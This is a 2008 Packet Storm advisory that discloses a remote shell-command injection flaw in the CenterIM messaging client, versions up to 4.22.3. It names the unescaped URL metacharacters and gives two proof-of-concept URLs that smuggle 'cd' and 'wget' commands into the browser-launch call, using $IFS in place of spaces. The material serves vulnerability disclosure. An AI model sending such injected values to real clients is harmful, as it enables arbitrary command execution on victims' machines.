centerim-exec.txt

2008-03-20T00:00:00
ID PACKETSTORM:64761
Type packetstorm
Reporter Brian Fonfara
Modified 2008-03-20T00:00:00

Description

                                        
                                            `#######################################################################  
  
Application: CenterIM  
http://www.centerim.org/index.php/Main_Page  
Versions: centerim <= 4.22.3  
OS: Linux  
Bug: Execution of shell commands  
Exploit: remote  
Date: 15 March 2008  
Author: Brian Fonfara (w00)  
eMail: brian.fonfara@gmx.de  
Web: newb.kicks-ass.net  
  
  
#######################################################################  
  
1) Bug  
2) Exploit  
  
  
#######################################################################  
  
=======  
1) Bug  
=======  
  
Received URLs in the message window do not get checked for illegal  
characters, like "\'", "\"", ";", "$", "{", "}", "&&" and "||"  
  
#######################################################################  
  
===========  
2) Exploit  
===========  
  
Standard settings:  
- Browser already open:  
http://gidf.de/centerim)';cd$IFS$HOME/Desktop;wget${IFS}http://google.de;'(  
  
- New browser instance:  
http://gidf.de/centerim"&cd$IFS$HOME/Desktop;wget${IFS}http://google.de"  
  
#######################################################################  
  
Greets to: mrks  
  
`